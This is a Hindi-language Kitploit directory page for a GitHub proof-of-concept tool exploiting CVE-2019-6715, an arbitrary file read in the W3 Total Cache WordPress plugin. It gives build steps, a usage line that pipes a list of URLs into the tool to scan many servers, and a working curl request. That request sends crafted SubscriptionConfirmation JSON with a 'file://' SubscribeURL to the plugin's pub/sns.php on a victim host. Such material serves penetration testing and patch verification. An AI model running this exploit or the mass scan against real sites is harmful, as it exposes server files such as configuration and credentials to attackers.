Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2019-6715 — CVE-2019-6715 के लिए PoC एक्सप्लॉइट: W3 Total Cache WordPress प्लगइन में तैयार किए गए SubscriptionConfirmation JSON के माध्यम से मनमाना फ़ाइल पढ़ना। पाइप किए गए URL सूची का उपयोग करके कमजोर सर्वरों से फ़ाइलें पढ़ता है। | Kitploit
उपकरण/GitHubGitHub/random-robbie/cve-2019-6715
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubrandom-robbie/cve-2019-6715

cve-2019-6715

CVE-2019-6715 के लिए PoC एक्सप्लॉइट: W3 Total Cache WordPress प्लगइन में तैयार किए गए SubscriptionConfirmation JSON के माध्यम से मनमाना फ़ाइल पढ़ना। पाइप किए गए URL सूची का उपयोग करके कमजोर सर्वरों से फ़ाइलें पढ़ता है।

रिपॉजिटरी देखें
1136 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

cve-2019-6715

टॉमनॉमनॉम को उनके 99.9% कोड के लिए धन्यवाद....

बिल्ड

go get github.com/fatih/color
go build

उपयोग

cat list.txt | ./2019-6715

सभी असुरक्षित URLs text.log में लॉग होते हैं

CVE 2019-6715

विवरण: WordPress के लिए W3 Total Cache प्लगइन के 0.9.4 से पहले संस्करण में pub/sns.php रिमोट हमलावरों को SubscriptionConfirmation JSON डेटा में SubscribeURL फ़ील्ड के माध्यम से मनमानी फ़ाइलें पढ़ने की अनुमति देता है।

भेद्यता प्रकार: मनमानी फ़ाइल पढ़ना

उत्पाद विक्रेता: Frederick Townes द्वारा Wordpress W3 Total Cache प्लगइन

प्रभावित उत्पाद कोड बेस: W3 Total Cache - 0.9.2.6 - 0.9.3, 0.9.4 में ठीक किया गया

प्रभावित घटक: प्रभावित सोर्स कोड फ़ाइल: w3-total-cache/pub/sns.php

एक्सप्लॉइट - पीओसी (PoC):

curl -X PUT --data '{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"file://file_path"}' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36' http://victim.com/wp-content/plugins/w3-total-cache/pub/sns.php
टूल डाउनलोड करें